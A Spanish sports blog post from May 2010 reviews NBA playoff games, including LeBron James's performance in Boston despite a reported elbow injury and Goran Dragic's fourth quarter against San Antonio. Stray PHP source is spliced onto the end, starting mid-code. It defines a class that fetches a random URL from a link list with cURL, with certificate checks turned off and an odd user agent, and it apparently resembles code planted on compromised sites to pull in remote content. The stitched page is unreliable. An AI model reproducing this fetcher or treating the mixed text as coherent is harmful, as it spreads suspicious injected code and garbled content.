Playoffs 07/05/2010: Golpes de estado

08 de May de 2010 por txusma

Problemas de codo. Sí… uff!!! ¡Cuán grave es la lesión en el codo del Elegido! Gravísima, oiga. No sabemos cómo es posible que se tenga en pie, el muchacho. Tan grave que llevaba 21 en el primero, más de 30 en el segundo y sí, ya se relajó cuando llegaba casi 40 no fuera que se le descoyuntara completamente. Ahora, que el partido en ese momento estaba muerto…

Es curioso. Justo ayer por la tarde, mucho antes de empezar la jornada de Friday’s night en la NBA, reflexionaba en otros ámbitos sobre la nueva moda de las “lesiones intermitentes”. Kobe no podía con su rodilla en presencia de Sefolosha, pero un par de días después destrozaba sin ninguna dificultad a C.J. Miles. A Williams no parecía dolerle ni una pestaña en el primer partido de la serie, pero en el segundo que no estuvo bien es porque tiene unas lesiones gravísimas. A Durant no le defendió nadie… jugó mal porque se puso nervioso. ¡Venga ya, hombre! Ahora resulta que cuando un “superclase” no juega todo lo bien que se espera tiene que ser por problemas ajenos a él mismo.

Si LeBron anoche, en lugar de destrozar como nadie lo había hecho nunca la defensa de Doc Rivers, de aniquilar completamente las esperanzas de un equipo campeón como Boston, de pasearse en el Garden como pocos de nosotros podríamos haber imaginado, si hubiera sucumbido a los Celtics hubiera sido por sus problemas en el codo. Nunca por el buen hacer del rival. Es la nueva moda de las excusas cautelares. Elevémoslos todavía más a los altares.

Y con esto no quiero decir que el asunto sea falso. Digo que se magnifica a conciencia. Que se trata de lesiones o molestias que no revisten gravedad y porque de otra forma no podrían arriesgar el inmenso imperio económico que son ellos mismos. Que lo de anoche es la demostración palmaria de que pretenden vendernos milongas con todo ese tipo de asuntos.

En fin, que al #23 de Cleveland le hemos visto hacer ya cosas muy grandes, pero muy pocas a la altura de lo que hizo anoche. Fue el mejor partido de la temporada de los Cavs y fue en el momento más indicado. Exhibición de campeones y mensaje a sus rivales. LeBron ni se inmutó tras haber arrasado de esa forma Boston. No confío en que los Celtics puedan levantarse después de un rejón semejante.

Por su parte, los Suns se encuentran a una sola victoria de alejar definitivamente muchos de sus fantasmas pasados y todo gracias a una de las mejores actuación en un último cuarto que se recuerdan en un partido de Playoffs. No fue de Nash, ni de Richardson, ni de Amare sinó de un jugador que se ha encontrado todo el año a la sombra del canadiense. Todo el año menos en los últimos 12 minutos del partido de ayer. Hablamos de Goran Dragic. El esloveno consiguió en el cuarto decisivo 23 puntos, fallando sólo 2 canastas de 11 intentos, anotando los 4 triples que intentó. Fue tal el torrente de baloncesto que Richardson y Amare no tuvieron que salir a pista en los últimos 12 minutos y Nash lo hizo los últimos tres para poder felicitar personalmente a Dragic porque el pescado ya estaba del todo vendido.

San Antonio desperdició una ventaja de 18 puntos permitiendo a unos Suns que estaban totalmente KO resarcirse y llegar con el partido empatado al último período. Y allí apareció Dragic cuando menos se le esperaba (por mucho que diga su entrenador o sus compañeros). Tony Parker volvió a la titularidad y casi fue peor el remedio que la enfermedad. Hill cuajó su peor partido en mucho tiempo (¿seguro que este Hill es el mismo que el de la primera ronda?) y Parker se cascó un 5 de 17. Es Ginobili sobre el que se sustenta actualmente toda la estructura aunque Duncan siempre esté ahí aunque ya no de manera tan determinante. Es posible que los tejanos ganen el siguiente partido pero nadie, jamás ha levantado un 3-0. Empresa imposible, hasta para ellos.

PREMIOS

MVP: 38 puntos, 8 rebotes, 7 asistencias, 2 tapones y me freno porque ya voy sobrado. Esto solo puede hacerlo “King” James.

Sorpresa: Ya hemos lanzado loas al último cuarto de Goran Dragic digno de las mejores historias que hay explicar a los nietos cuando seamos mayores. Siempre quedan mejor con Kobe, Jordan o cualquier otro super clase, pero lo de Dragic también vale. Y mucho.

Decepción: La pareja Parker – Hill anotó 18 puntos con un acierto del 25%. Popovic ya no sabe que hacer.

Esfuerzo en vano: Quién iba a imaginar lo sólo que se encontraría Ginobili en su eliminatoria frente los Suns. 27 puntos infructuosos consiguió anoche el argentino.

Y MAÑANA…

Vuelven los Lakers,esta vez a Salt Lake City donde habrá que ver si son capaces de lograr la tercera victoria de la serie. Victoria que a priori parecen tener más al alcance los Magic después de lo visto en los 2 primeros partidos…

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>